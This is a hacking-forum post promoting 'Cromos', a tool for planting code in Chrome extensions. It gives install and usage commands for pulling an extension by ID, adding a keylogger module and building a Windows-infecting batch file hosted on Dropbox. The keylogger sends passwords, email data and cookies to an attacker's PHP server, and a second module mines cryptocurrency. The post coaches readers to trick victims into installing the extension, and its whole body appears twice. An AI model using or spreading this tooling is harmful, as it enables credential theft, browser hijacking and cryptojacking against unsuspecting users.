- Joined
- May 15, 2017
- Messages
- 981
- Likes
- 760
- Points
- 1,045
Cromos is a utility for modifying Chrome extensions and embedding your code in them. Allows you to create your own executable files and place files in Dropbox.
Thus, we can embed our code in any extension that is in Google. How can this be used? We can take any extension that is in public, we introduce for example a styler and with the help of social engineering we force the victim to install it "Install this extension, you will have snow on your page". This is like an example, you can come up with something of your own and use any other extension. 90% of hacking success. 10% - the stupidity of the victim ala I can not install, etc.
Functionality:
· Downloading an extension
· Implementing a code
· Uploading files to Dropbox
· Infecting the Windows family OS
Installation:
git clone https://github.com/fbctf/cromos cd / cromospip install –r requirements.txtpython setup.py
Help :
./cromos.py –h
How to use:
· Download the extension we need from market, first determining its ID.
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
· Load the extension and add the keylogger module to it.
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
Create a batch file and place it in Dropbox:
python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Modules:
· modules / keylogger- This module remembers passwords entered in the infected browser via https or not. To do this, you need to have a php server to receive: email data, passwords, cookies and userAgent.
· Modules / currency - Very cool stuff. Mine of cryptocurrency. True, you will need an account on coinhive.
Below I will post a link to the video in which the developers themselves tell us how to use the tool:
https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1
Thus, we can embed our code in any extension that is in Google. How can this be used? We can take any extension that is in public, we introduce for example a styler and with the help of social engineering we force the victim to install it "Install this extension, you will have snow on your page". This is like an example, you can come up with something of your own and use any other extension. 90% of hacking success. 10% - the stupidity of the victim ala I can not install, etc.
Functionality:
· Downloading an extension
· Implementing a code
· Uploading files to Dropbox
· Infecting the Windows family OS
Installation:
git clone https://github.com/fbctf/cromos cd / cromospip install –r requirements.txtpython setup.py
Help :
./cromos.py –h
How to use:
· Download the extension we need from market, first determining its ID.
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
· Load the extension and add the keylogger module to it.
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
Create a batch file and place it in Dropbox:
python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Modules:
· modules / keylogger- This module remembers passwords entered in the infected browser via https or not. To do this, you need to have a php server to receive: email data, passwords, cookies and userAgent.
· Modules / currency - Very cool stuff. Mine of cryptocurrency. True, you will need an account on coinhive.
Below I will post a link to the video in which the developers themselves tell us how to use the tool:
https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1